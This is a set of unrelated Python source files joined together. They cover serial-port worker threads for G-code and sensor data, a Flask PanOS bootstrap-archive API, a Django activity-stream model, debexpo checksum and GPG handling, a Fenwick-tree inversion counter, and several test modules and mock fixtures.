self.flagStop = False
self.serialport = serialport
#self.thread = QThread()
#self.thread.started.connect(self.run)
#self.signal_pass_encoder.connect(callback)
#self.moveToThread(self.thread)
#self.thread.start()
super().__init__()
def Stop(self):
self.flagStop = True
@Slot()
def run(self):
while True:
if self.flagStop:
break
else:
jMessage = ""
in_waiting = self.serialport.in_waiting
while in_waiting == 0:
time.sleep(0.05)
in_waiting = self.serialport.in_waiting
try:
lst = self.serialport.readlines()
except:
pass
for itm in lst:
try:
jMessage = itm.decode('ascii')
self.signal_pass_encoder.emit(jMessage)
except:
pass
'''
for char in self.serialport.read():
self.line.append(chr(char))
if chr(char) == '\n':
self.rec_data = "".join(self.line)
self.line.clear()
self.signal_pass_encoder.emit(self.rec_data)
#print(self.rec_data)
'''
'''
class WorkerThread(QObject):
signal = Signal(str)
def __init__(self, serialPort, codegen, commandque:Queue):
self.serialPort = serialPort
self.codegen = codegen
self.commandque = commandque
self.codelist = self.codegen.gcodestr.splitlines()
self.linecount = len(self.codelist)
self.flagexit = False
self.flagStop = False
super().__init__()
self.respondQue = Queue()
def Stop(self):
self.flagStop = True
def Resume(self):
self.flagStop = False
def updateGcode(self, codegen):
self.codegen = codegen
self.codelist = self.codegen.gcodestr.splitlines()
@Slot()
def run(self):
lst = []
while 1:
if self.flagStop:
time.sleep(1)
if self.respondQue.qsize() <= 0:
self.respondQue.put("stopped")
continue
if self.commandque.qsize() > 0:
if self.commandque.get() == "exit":
self.flagexit = True
break
try:
for line in self.codelist:
self.serialPort.write((str(line)+"\r\n").encode('utf-8'))
time.sleep(0.1)
in_waiting = self.serialPort.in_waiting
while in_waiting == 0:
time.sleep(0.5) #1
in_waiting = self.serialPort.in_waiting
jMessage = ""
while "ok" not in jMessage:
while self.serialPort.in_waiting:
lst = self.serialPort.readlines()
for itm in lst:
jMessage += itm.decode('ascii')
self.signal.emit(str(line) + " - " + jMessage)
except serial.SerialException as ex:
print("Error In SerialException" + str(ex))
'''
class WorkerThread(QObject):
signal = Signal(str)
def __init__(self, serialPort, codegen, commandque:Queue):
self.serialport = serialPort
self.codegen = codegen
self.commandque = commandque
self.codelist = self.codegen.gcodestr.splitlines()
self.linecount = len(self.codelist)
self.flagexit = False
self.flagStop = False
self.cycleToRun = 0
self.cycleCount = -1
super().__init__()
self.respondQue = Queue()
def Stop(self):
self.flagStop = True
def Resume(self):
self.flagStop = False
def updateGcode(self, codegen, cycleToRun=0):
self.cycleToRun = cycleToRun
self.codegen = codegen
self.codelist = self.codegen.gcodestr.splitlines()
@Slot()
def run(self):
jMessage:str = ""
unit:bytes = b''
itm:str = ''
in_waiting:int = 0
while 1:
if self.cycleToRun > 0:
#print( self.codegen.gcodestr + ' :: cycleToRun : ' + str(self.cycleToRun))
if (self.cycleCount >= self.cycleToRun):
time.sleep(1)
continue
else:
self.cycleCount += 1
if self.cycleCount == self.cycleToRun:
print( self.codegen.gcodestr + ' :: cycleToRun : ' + str(self.cycleToRun))
if self.flagStop:
time.sleep(1)
if self.respondQue.qsize() <= 0:
self.respondQue.put("stopped")
continue
if self.commandque.qsize() > 0:
if self.commandque.get() == "exit":
self.flagexit = True
break
try:
for line in self.codelist:
self.serialport.write((str(line)+"\r\n").encode('utf-8'))
time.sleep(0.5)
jMessage = ''
while 'ok' not in jMessage:
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0X17 : ' + str(e))
'''
while in_waiting == 0:
time.sleep(0.05)
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0x18 : ' + str(e))
'''
try:
while in_waiting == 0:
time.sleep(0.02)
in_waiting = self.serialport.in_waiting
unit = self.serialport.read(in_waiting)
except Exception as e:
print('Ex in sensor Thread readline() 392 : ' + str(e))
if len(unit) > 0:
try:
itm += unit.decode('ascii')
except:
pass
#else:
# time.sleep(0.1)
if b'\n' in unit:
jMessage = itm #.decode('ascii')
itm = ''
self.signal.emit(str(line) + " - " + jMessage)
if 'ok' not in jMessage:
pass
#time.sleep(0.01)
except serial.SerialException as ex:
print("Error In SerialException WorkerThread L- 410 : " + str(ex))
class BipapWorkerThread(QObject):
signal = Signal(str)
def __init__(self, serialPort, codegen, commandque:Queue):
self.serialPort = serialPort
self.codegen = codegen
self.commandque = commandque
self.codelist = self.codegen.gcodestr.splitlines()
self.linecount = len(self.codelist)
self.flagexit = False
self.flagStop = False
super().__init__()
self.respondQue = Queue()
def Stop(self):
self.flagStop = True
def Resume(self):
self.flagStop = False
def updateGcode(self, codegen):
self.codegen = codegen
self.codelist = self.codegen.gcodestr.splitlines()
@Slot()
def run(self):
lst = []
while 1:
if self.flagStop:
time.sleep(1)
if self.respondQue.qsize() <= 0:
self.respondQue.put("stopped")
continue
if self.commandque.qsize() > 0:
if self.commandque.get() == "exit":
self.flagexit = True
break
try:
for line in self.codelist:
self.serialPort.write((str(line)+"\r\n").encode('utf-8'))
time.sleep(0.1)
in_waiting = self.serialPort.in_waiting
while in_waiting == 0:
time.sleep(0.5) #1
in_waiting = self.serialPort.in_waiting
jMessage = ""
while "ok" not in jMessage:
while self.serialPort.in_waiting:
lst = self.serialPort.readlines()
for itm in lst:
try:
jMessage += itm.decode('ascii')
except:
pass
self.signal.emit(str(line) + " - " + jMessage)
except serial.SerialException as ex:
print("Error In SerialException" + str(ex))
class SensorThread(QObject):
signal = Signal(str)
plst = []
def __init__(self, serialPort, que):
self.pressureque = que
self.serialport = serialPort
self.flagStop = False
self.jMessage = ""
self._beep = False
self.flag_sensorlimit_tx = False
self.strdata = ""
super().__init__()
def Stop(self):
self.flagStop = True
def beep(self):
self._beep = True
def txsensordata(self, strdata):
self.strdata = strdata
self.flag_sensorlimit_tx = True
@Slot()
def run(self):
in_waiting = ''
jMessage = ""
unit = ''
itm = ''
while 1:
if self.flagStop:
break
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0X07 : ' + str(e))
while in_waiting == 0:
time.sleep(0.01)
try:
in_waiting = self.serialport.in_waiting
except Exception as e:
print('Ex:0x08 : ' + str(e))
try:
unit = self.serialport.read(in_waiting)
except Exception as e:
print('Ex in sensor Thread readline() 527 : ' + str(e))
if len(unit) > 0:
try:
itm += unit.decode('ascii')
except:
pass
if b'\n' in unit:
jMessage = itm #.decode('ascii')
itm = ''
#jMessage += ',' + str(time.perf_counter())
self.plst = jMessage.split(",")
self.signal.emit(jMessage)
if self.pressureque.qsize() <= 0:
self.pressureque.put(self.plst[0])
if self.flag_sensorlimit_tx:
self.flag_sensorlimit_tx = False
self.serialport.write(self.strdata.encode('utf-8'))
time.sleep(0.5)
|
python
|
from urllib.parse import unquote
from flask import Flask
from flask import Response
from flask import abort
from flask import jsonify
from flask import render_template
from flask import request
from flask import send_file
from werkzeug.exceptions import BadRequest
from bootstrapper.lib import archive_utils
from bootstrapper.lib import bootstrapper_utils
from bootstrapper.lib import cache_utils
from bootstrapper.lib.db import db_session
from bootstrapper.lib.db import init_db
from bootstrapper.lib.exceptions import RequiredParametersError
from bootstrapper.lib.exceptions import TemplateNotFoundError
app = Flask(__name__)
defaults = bootstrapper_utils.load_defaults()
config = bootstrapper_utils.load_config()
@app.route('/')
def index():
"""
Default route, return simple HTML page
:return: index.htnl template
"""
return render_template('index.html', title='PanOS Bootstrap Utility')
@app.route('/bootstrapper.swagger.json')
def api():
"""
Simple api to return the swagger json
:return: json file
"""
return send_file('templates/bootstrapper.swagger.json')
@app.route('/get/<key>', methods=['GET'])
def get_object_contents(key):
"""
Get object from cache, useful to 'chain' together actions
:return: json encoded string with dict containing with key and contents keys
"""
if key is None or key == "":
r = jsonify(message="Not all required params are present", success=False, status_code=400)
r.status_code = 400
return r
contents = cache_utils.get(key)
return Response(contents)
@app.route('/set', methods=['POST'])
def set_object():
"""
Adds an serializable object to the cache
:return: json encoded string with dict containing key and success keys
"""
posted_json = request.get_json(force=True)
contents = posted_json.get('contents', None)
if contents is None:
r = jsonify(message="Not all required keys are present", success=False, status_code=400)
r.status_code = 400
return r
key = cache_utils.set(contents)
return jsonify(key=key, success=True)
@app.route('/generate_bootstrap_package', methods=['POST'])
def generate_bootstrap_package():
"""
Main function to build a bootstrap archive. You must post the following params:
hostname: we cannot build an archive without at least a hostname
deployment_type: openstack, kvm, vmware, etc.
archive_type: zip, iso
You must also supply all the variables required from included templates
:return: binary package containing variable interpolated templates
"""
try:
posted_json = request.get_json(force=True)
base_config = bootstrapper_utils.build_base_configs(posted_json)
except (BadRequest, RequiredParametersError):
abort(400, 'Invalid input parameters')
except TemplateNotFoundError:
print('Could not load tempaltes!')
abort(500, 'Could not load template!')
# if desired deployment type is openstack, then add the heat templates and whatnot
if 'deployment_type' in posted_json and posted_json['deployment_type'] == 'openstack':
try:
base_config = bootstrapper_utils.build_openstack_heat(base_config, posted_json, archive=True)
except RequiredParametersError:
abort(400, 'Could not parse JSON data')
if 'hostname' not in posted_json:
abort(400, 'No hostname found in posted data')
# if the user supplies an 'archive_type' parameter we can return either a ZIP or ISO
archive_type = posted_json.get('archive_type', 'zip')
# user has specified they want an ISO built
if archive_type == 'iso':
archive = archive_utils.create_iso(base_config, posted_json['hostname'])
mime_type = 'application/iso-image'
else:
# no ISO required, just make a zip
archive = archive_utils.create_archive(base_config, posted_json['hostname'])
mime_type = 'application/zip'
print("archive path is: %s" % archive)
if archive is None:
abort(500, 'Could not create archive! Check bootstrapper logs for more information')
return send_file(archive, mimetype=mime_type)
@app.route('/get_bootstrap_variables', methods=['POST'])
def get_bootstrap_variables():
print('Compiling variables required in payload to generate a valid bootstrap archive')
posted_json = request.get_json(force=True)
vs = bootstrapper_utils.get_bootstrap_variables(posted_json)
payload = dict()
if 'bootstrap_template' in posted_json and posted_json['bootstrap_template'] is not None:
print('Using bootstrap %s' % posted_json['bootstrap_template'])
payload['bootstrap_template'] = posted_json['bootstrap_template']
else:
print('No bootstrap file requested')
if 'init_cfg_template' in posted_json and posted_json['init_cfg_template'] is not None:
print('Setting init_cfg_name')
payload['init_cfg_template'] = posted_json['init_cfg_template']
else:
print('No init_cfg file requested')
if 'format' in posted_json and posted_json['format'] == 'aframe':
for v in vs:
payload[v] = "{{ %s }}" % v
else:
for v in vs:
payload[v] = ""
return jsonify(success=True, payload=payload, status_code=200)
@app.route('/import_template', methods=['POST'])
def import_template():
"""
Adds a template location to the configuration
:return: json with 'success', 'message' and 'status' keys
"""
posted_json = request.get_json(force=True)
try:
name = posted_json['name']
encoded_template = posted_json['template']
description = posted_json.get('description', 'Imported Template')
template_type = posted_json.get('type', 'bootstrap')
template = unquote(encoded_template)
except KeyError:
print("Not all required keys are present!")
r = jsonify(message="Not all required keys for add template are present", success=False, status_code=400)
r.status_code = 400
return r
print('Importing template with name: %s' % name)
print('Importing template with description: %s' % description)
print(template)
if bootstrapper_utils.import_template(template, name, description, template_type):
return jsonify(success=True, message='Imported Template Successfully', status_code=200)
else:
r = jsonify(success=False, message='Could not import template repository to the configuration',
status_code=500)
r.status_code = 500
return r
@app.route('/delete_template', methods=['POST'])
def delete_template():
"""
Adds a template location to the configuration
:return: json with 'success', 'message' and 'status' keys
"""
posted_json = request.get_json(force=True)
try:
name = posted_json['template_name']
except KeyError:
print("Not all required keys are present!")
r = jsonify(message="Not all required keys for add template are present", success=False, status_code=400)
r.status_code = 400
return r
if bootstrapper_utils.delete_template(name):
return jsonify(success=True, message='Deleted Template Successfully', status_code=200)
else:
r = jsonify(success=False, message='Could not delete template', status_code=500)
r.status_code = 500
return r
@app.route('/list_templates', methods=['GET'])
def list_templates():
ts = bootstrapper_utils.list_bootstrap_templates()
return jsonify(success=True, templates=ts, status_code=200)
@app.route('/get_template', methods=['POST'])
def get_template():
posted_json = request.get_json(force=True)
try:
name = posted_json['template_name']
except KeyError:
print("Not all required keys are present!")
r = jsonify(message="Not all required keys for add template are present", success=False, status_code=400)
r.status_code = 400
return r
ts = bootstrapper_utils.get_template(name)
return Response(ts, mimetype='text/plain')
@app.route('/list_init_cfg_templates', methods=['GET'])
def list_init_cfg_templates():
ts = bootstrapper_utils.list_init_cfg_templates()
return jsonify(success=True, templates=ts, status_code=200)
@app.teardown_appcontext
def shutdown_session(exception=None):
db_session.remove()
@app.before_first_request
def init_application():
init_db()
bootstrapper_utils.import_templates()
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
|
python
|
# stream.models
# Database models for the Activity Stream Items
#
# Author: Benjamin Bengfort <[email protected]>
# Created: Wed Feb 04 10:24:36 2015 -0500
#
# Copyright (C) 2016 District Data Labs
# For license information, see LICENSE.txt
#
# ID: models.py [70aac9d] [email protected] $
"""
Database models for the Activity Stream items
"""
##########################################################################
## Imports
##########################################################################
from django.db import models
from model_utils import Choices
from django.utils.timesince import timesince
from minent.utils import nullable, notnullable
from stream.managers import StreamItemManager
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey
from django.utils import timezone as datetime
##########################################################################
## Activity Stream models
##########################################################################
class StreamItem(models.Model):
"""
Contains a relationship between a user and any other content item via
a Generic relationship. It can then be used to describe an action
model as follows:
<actor> <verb> <time>
<actor> <verb> <target> <time>
<actor> <verb> <theme> <target> <time>
For example:
<bbengfort> <logged in> <1 minute ago>
<mcox> <asked> <question> <2 hours ago>
<dperlis> <annotated> <topic> on <question> <a day ago>
Much of this data type is created automatically (e.g. not interacted
with by users except through views). A secondary table is used to
store the activity stream to ensure that it can be quickly loaded,
even though many of the items in question already have a relationship
to some user!
"""
## Potential actions (verbs) for the activity stream
## DB storage is the infinitive, display is past tense
VERBS = Choices(
('join', 'joined'),
('view', 'viewed'),
('upvote', 'up voted'),
('downvote', 'down voted'),
('ask', 'asked'),
('answer', 'answered'),
)
## Relationship to the user (the actor)
actor = models.ForeignKey( 'auth.User', related_name='activity_stream' ) # The actor causing the event
## Generic relationship to a target
target_content_type = models.ForeignKey( ContentType, related_name="targets", **nullable )
target_object_id = models.PositiveIntegerField( **nullable )
target = GenericForeignKey( 'target_content_type', 'target_object_id' )
## Generic relationship to a theme (action object)
theme_content_type = models.ForeignKey( ContentType, related_name="themes", **nullable )
theme_object_id = models.PositiveIntegerField( **nullable )
theme = GenericForeignKey( 'theme_content_type', 'theme_object_id' )
## Meta data concerning the activity
public = models.BooleanField( default=True ) # May appear in public feeds?
verb = models.CharField( max_length=20, choices=VERBS ) # The "verb" or "action" or "event"
details = models.TextField( **nullable ) # Additional details about the action
timestamp = models.DateTimeField( default=datetime.now, db_index=True ) # The timestamp of the action (note no created and modified)
## A custom manager for the StreamItem
objects = StreamItemManager()
## Database setup and meta
class Meta:
app_label = 'stream'
db_table = 'activity_stream'
ordering = ('-timestamp',)
verbose_name = 'activity stream item'
verbose_name_plural = 'activity stream items'
######################################################################
## Methods on the Stream Item
######################################################################
def timesince(self, now=None):
"""
Returns a string representation of the time since the timestamp.
"""
return timesince(self.timestamp, now).encode('utf8').replace(b'\xc2\xa0', b' ').decode('utf8')
def get_object_url(self, obj):
"""
Returns the URL of an object by using the `get_absolute_url` method
otherwise returns None. (Shouldn't raise an error).
"""
if hasattr(obj, 'get_absolute_url'):
return obj.get_absolute_url()
return None
def get_actor_url(self):
return self.get_object_url(self.actor)
def get_target_url(self):
return self.get_object_url(self.target)
def get_theme_url(self):
return self.get_absolute_url(self.theme)
def get_object_repr(self, obj):
"""
Returns an HTML representation of an object, basically an anchor
to the object's absolute URL or just the plain string representation.
"""
# If the object knowns how to represent itself ...
if hasattr(obj, 'get_stream_repr'):
return obj.get_stream_repr()
# Otherwise, simply return the string representation
return str(obj)
def __str__(self):
context = {
'actor': self.actor.username,
'verb': self.get_verb_display(),
'theme': self.get_object_repr(self.theme),
'target': self.get_object_repr(self.target),
'timesince': self.timesince(),
}
if self.target:
if self.theme:
return "{actor} {verb} {theme} on {target} {timesince} ago".format(**context)
return "{actor} {verb} {target} {timesince} ago".format(**context)
if self.theme:
return "{actor} {verb} {theme} {timesince} ago".format(**context)
return "{actor} {verb} {timesince} ago".format(**context)
|
python
|
# files.py — Debexpo files handling functions
#
# This file is part of debexpo -
# https://salsa.debian.org/mentors.debian.net-team/debexpo
#
# Copyright © 2019 Baptiste Beauplat <[email protected]>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from os.path import basename, join, isfile
from os import replace, unlink
import hashlib
from debexpo.keyring.models import Key
from debexpo.tools.gnupg import GnuPG, ExceptionGnuPGNoPubKey
class ExceptionCheckSumedFile(Exception):
pass
class ExceptionCheckSumedFileNoFile(ExceptionCheckSumedFile):
def __init__(self, e):
self.message = str(e)
def __str__(self):
return self.message
class ExceptionCheckSumedFileNoMethod(ExceptionCheckSumedFile):
def __init__(self, filename):
self.filename = filename
def __str__(self):
return f'No checksum method available for file {self.filename}.'
class ExceptionCheckSumedFileFailedSum(ExceptionCheckSumedFile):
def __init__(self, filename, expected, computed):
self.filename = filename
self.expected = expected
self.computed = computed
def __str__(self):
return f'Checksum failed for file {basename(self.filename)}.\n\n' \
f'Expected: {self.expected}\n' \
f'Computed: {self.computed}'
class GPGSignedFile():
def __init__(self, filename):
self.filename = filename
self.key = None
def authenticate(self):
lookup = self._lookup_fingerprint()
try:
if lookup.fingerprint:
search = lookup.fingerprint
else:
search = lookup.long_id
self.key = Key.objects.get_key_by_fingerprint(search)
except Key.DoesNotExist:
raise lookup
self.keyring = GnuPG()
self.keyring.import_key(self.key.key)
self.keyring.verify_sig(self.filename)
def _lookup_fingerprint(self):
gpg = GnuPG()
try:
gpg.verify_sig(self.filename)
except ExceptionGnuPGNoPubKey as e:
return e
def get_key(self):
return self.key
class CheckSumedFile():
METHODS = ('sha512', 'sha256')
def __init__(self, filename):
self.filename = filename
self.checksums = {}
# Two Checksumed files are considered equals if
# at least one of their checksum is equal.
# This does not perform any kind of file validation.
def __eq__(self, other):
for method in self.METHODS:
if method in self.checksums.keys() and \
method in other.checksums.keys():
if self.checksums[method] == other.checksums[method]:
return True
return False
def add_checksum(self, method, checksum):
self.checksums[method] = checksum
def validate(self):
for method in self.METHODS:
checksum = self.checksums.get(method)
if checksum:
hash_function = getattr(hashlib, method)
validator = hash_function()
try:
data = open(self.filename, 'rb')
except FileNotFoundError:
raise ExceptionCheckSumedFileNoFile(
f'{basename(self.filename)} is missing from '
'upload')
else:
with data:
while True:
chunk = data.read(10240)
if not chunk:
break
validator.update(chunk)
if validator.hexdigest() != checksum:
raise ExceptionCheckSumedFileFailedSum(
self.filename, checksum, validator.hexdigest()
)
else:
return True
raise ExceptionCheckSumedFileNoMethod(self.filename)
def __str__(self):
return basename(self.filename)
def move(self, destdir):
if not isfile(self.filename):
return
dest = join(destdir, basename(self.filename))
replace(self.filename, dest)
self.filename = dest
def remove(self):
if isfile(self.filename):
unlink(self.filename)
|
python
|
# -*- coding: utf-8 -*-
class BIT:
def __init__(self, size: int) -> None:
self.size = size
self._bit = [0 for _ in range(self.size + 1)]
def add(self, index: int, value: int) -> None:
while index <= self.size:
self._bit[index] += value
index += index & -index
def sum(self, index) -> int:
summed = 0
while index > 0:
summed += self._bit[index]
index -= index & -index
return summed
def main():
n = int(input())
a = list(map(int, input().split()))
bit = BIT(n)
ans = 0
for index, ai in enumerate(a, 1):
bit.add(ai, 1)
ans += index - bit.sum(ai)
print(ans)
if __name__ == "__main__":
main()
|
python
|
"""Mock input data for unit tests."""
from copy import deepcopy
import uuid
# no dependencies
MOCK_BASE_PATH = "a/b/c"
MOCK_DRS_URI = "drs://fakehost.com/SOME_OBJECT"
MOCK_DRS_URI_INVALID = "dr://fakehost.com/SOME_OBJECT"
MOCK_DRS_URI_LONG = (
"drs://aaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaaaaaaaaaaaaaaaaaaaaa"
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.aaaa.com/SOME_OBJECT"
)
MOCK_ERROR = {
"msg": "mock_message",
"status_code": "400"
}
MOCK_ERROR_MSG = "SYSTEM HANDLER"
MOCK_ERROR_MSG_CUSTOM_HANDLER = "CUSTOM HANDLER"
MOCK_FILE_URL = "ftp://my.ftp.service/my_path/my_file_01.txt"
MOCK_HOST = "https://fakehost.com"
MOCK_ID = str(uuid.uuid4())
MOCK_PORT = 8080
MOCK_SELF_URI = f"https://fakehost.com/ga4gh/drs/v1/objects/{MOCK_ID}"
MOCK_TOKEN = "MyT0k3n"
# with dependencies
MOCK_ACCESS_URL = {
"url": MOCK_FILE_URL,
"headers": [
"None"
],
}
MOCK_ACCESS_METHODS = [
{
"type": "ftp",
"access_url": MOCK_ACCESS_URL,
},
]
MOCK_CHECKSUMS = [
{
"checksum": "18c2f5517e4ddc02cd57f6c7554b8e88",
"type": "md5",
},
]
MOCK_DRS_URL = f"{MOCK_HOST}:{MOCK_PORT}/ga4gh/drs/v1/objects"
MOCK_OBJECT_POST_INVALID = {
"updated_time": "2019-04-24T05:23:43-06:00",
"version": "1",
"size": 5,
"mime_type": "",
"checksums": MOCK_CHECKSUMS,
"access_methods": MOCK_ACCESS_METHODS,
}
MOCK_OBJECT_GET_INVALID = deepcopy(MOCK_OBJECT_POST_INVALID)
MOCK_OBJECT_GET_INVALID['id'] = MOCK_ID
MOCK_OBJECT_GET_INVALID['self_uri'] = MOCK_SELF_URI
MOCK_OBJECT_GET_INVALID['access_methods'][0]['access_id'] = MOCK_ID
MOCK_OBJECT_POST = deepcopy(MOCK_OBJECT_POST_INVALID)
MOCK_OBJECT_POST['created_time'] = "2019-05-20T00:12:34-07:00"
MOCK_OBJECT_GET = deepcopy(MOCK_OBJECT_GET_INVALID)
MOCK_OBJECT_GET['created_time'] = "2019-05-20T00:12:34-07:00"
|
python
|
from sikuli import *
import sys
sys.path.insert(0, '/home/vagrant/Integration-Testing-Framework/sikuli/examples')
from test_helper import TestHelper
import open_flex_from_backup, check_change
helper = TestHelper("run_tests_from_backups")
folder = "/home/vagrant/Integration-Testing-Framework/sikuli/examples/images_for_comparison/"
backups_folder = "/home/vagrant/Integration-Testing-Framework/flex/projects/"
# Open Tagbanwa
open_flex_from_backup.open_backup(backups_folder + "Tagbanwa, Calamian 2015-07-07 1037 for testing purposes.fwbackup", True)
check_change.check_dictionary(folder + "Tagbanwa - dictionary.png")
check_change.check_word("dalik", folder + "Tagbanwa - dalik.png") # IXTERMINATE
check_change.check_word("bugnawan", folder + "Tagbanwa - bugnawan.png")
# Open Kamasau
open_flex_from_backup.open_backup(backups_folder + "Kamasau 2015-07-07 1036 for testing purposes.fwbackup", True)
check_change.check_dictionary(folder + "Kamasau - dictionary.png")
check_change.check_word("chiraq", folder + "Kamasau - chiraq.png") # like the French president in like the 2000s
check_change.check_word("gre", folder + "Kamasau - gre.png")
# Open Ayta Mag-Anchi
open_flex_from_backup.open_backup(backups_folder + "Ayta Mag-Anchi2 2015-07-07 1035 for testing purposes.fwbackup", True)
check_change.check_text("kulot2.ptx", folder + "Ayta - kulot2.ptx.png")
# Restart flex to hello project, closing the 3 windows
# we just opened + whatever was open before
helper.restart_flex()
|
python
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""File service tests."""
from io import BytesIO
def test_file_flow(
file_service, location, example_file_record, identity_simple):
"""Test the lifecycle of a file.
- Initialize file saving
- Save 1 files
- Commit the files
- List files of the record
- Read file metadata
- Retrieve a file
- Delete a file
- Delete all remaining files
- List should be empty
"""
recid = example_file_record['id']
file_to_initialise = [{
'key': 'article.txt',
'checksum': 'md5:c785060c866796cc2a1708c997154c8e',
'size': 17, # 2kB
'metadata': {
'description': 'Published article PDF.',
}
}]
# Initialize file saving
result = file_service.init_files(
recid, identity_simple, file_to_initialise)
assert result.to_dict()['entries'][0]['key'] == \
file_to_initialise[0]['key']
# for to_file in to_files:
content = BytesIO(b'test file content')
result = file_service.set_file_content(
recid, file_to_initialise[0]['key'], identity_simple, content,
content.getbuffer().nbytes
)
# TODO figure response for succesfully saved file
assert result.to_dict()['key'] == file_to_initialise[0]['key']
result = file_service.commit_file(
recid, 'article.txt', identity_simple)
# TODO currently there is no status in the json between the initialisation
# and the commiting.
assert result.to_dict()['key'] == \
file_to_initialise[0]['key']
# List files
result = file_service.list_files(recid, identity_simple)
assert result.to_dict()['entries'][0]['key'] == \
file_to_initialise[0]['key']
# Read file metadata
result = file_service.read_file_metadata(
recid, 'article.txt', identity_simple)
assert result.to_dict()['key'] == \
file_to_initialise[0]['key']
# Retrieve file
result = file_service.get_file_content(
recid, 'article.txt', identity_simple)
assert result.file_id == 'article.txt'
# Delete file
result = file_service.delete_file(
recid, 'article.txt', identity_simple)
assert result.file_id == 'article.txt'
# Assert deleted
result = file_service.list_files(recid, identity_simple)
assert result.entries
assert len(list(result.entries)) == 0
# Delete all remaining files
result = file_service.delete_all_files(recid, identity_simple)
assert list(result.entries) == []
|
python
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from future.builtins import object
from contextlib import contextmanager
import sys
import unittest
from redis import Redis
from limpyd.database import (RedisDatabase, DEFAULT_CONNECTION_SETTINGS)
TEST_CONNECTION_SETTINGS = DEFAULT_CONNECTION_SETTINGS.copy()
TEST_CONNECTION_SETTINGS['db'] = 15
test_database = RedisDatabase(**TEST_CONNECTION_SETTINGS)
class LimpydBaseTest(unittest.TestCase):
COUNT_LOCK_COMMANDS = 4
database = test_database
@property
def connection(self):
return self.database.connection
def setUp(self):
# Ensure that we are on the right DB before flushing
current_db_id = self.connection.connection_pool.connection_kwargs['db']
assert current_db_id != DEFAULT_CONNECTION_SETTINGS['db']
assert current_db_id == TEST_CONNECTION_SETTINGS['db']
self.connection.flushdb()
def tearDown(self):
self.connection.flushdb()
def count_commands(self):
"""
Helper method to only count redis commands that work on keys (ie ignore
commands like info...)
"""
return self.connection.info()['total_commands_processed']
def count_keys(self):
"""
Helper method to return the number of keys in the test database
"""
return self.connection.dbsize()
def assertNumCommands(self, num=None, func=None, *args, **kwargs):
"""
A context assert, to use with "with":
with self.assertNumCommands(2):
obj.field.set(1)
obj.field.get()
"""
context = _AssertNumCommandsContext(self, num, *args, **kwargs)
if func is None:
return context
# Basically emulate the `with` statement here.
context.__enter__()
try:
func(*args, **kwargs)
except:
context.__exit__(*sys.exc_info())
raise
else:
context.__exit__(*sys.exc_info())
if not hasattr(unittest.TestCase, 'subTest'):
@contextmanager
def subTest(self, msg=None, **params):
# support for the `subTest` command not available before python 3.4
# does nothing except running included test
yield
def assertSlicingIsCorrect(self, collection, check_data, check_only_length=False, limit=5):
"""Test a wide range of slicing of the given collection, compared to a python list
Parameters
----------
collection: Collection
The collection to test. Should not have been sliced yet
check_data: list
The python list containing the same values as the limpyd collection.
The result of slicing the collection will be compared to the result of slicing
this list
check_only_length: bool
Default to ``False``. When ``True``, only the length of the slicing of the collection
is compared to the slicing of the python list. To be used only when resulting content
cannot be assured (for unsorted collections)
limit: int
Default to ``5``, it's the boundary of the slicing ranges that will be tested.
``5`` means will use all values from ``-5`` to ``5`` for each of the three parts
of the slicing.
"""
# check we have the correct dataset
if check_only_length:
assert len(collection) == len(check_data), 'Wrong dataset for this test'
else:
assert sorted(collection) == check_data, 'Wrong dataset for this test'
# do all the slices
for start in list(range(-limit, limit+1)) + [None]:
for stop in list(range(-limit, limit+1)) + [None]:
for step in range(-limit, limit+1):
if not step:
continue
expected = check_data[start:stop:step]
for test_collection, clone in ((collection, False), (collection.clone(), True)):
with self.subTest(Start=start, Stop=stop, step=step, clone=clone):
sliced_collection = test_collection[start:stop:step]
if not check_only_length:
self.assertEqual(
list(sliced_collection),
expected,
'Unexpected result for `%s:%s:%s`' % (
'' if start is None else start,
'' if stop is None else stop,
'' if step is None else step,
)
)
self.assertEqual(
len(sliced_collection),
len(expected),
'Unexpected length result for `%s:%s:%s`' % (
'' if start is None else start,
'' if stop is None else stop,
'' if step is None else step,
)
)
class _AssertNumCommandsContext(object):
"""
A context to count commands occured
"""
def __init__(self, test_case, num=None, min_num=None, max_num=None, checkpoints=False):
self.test_case = test_case
if num is None and min_num is None and max_num is None:
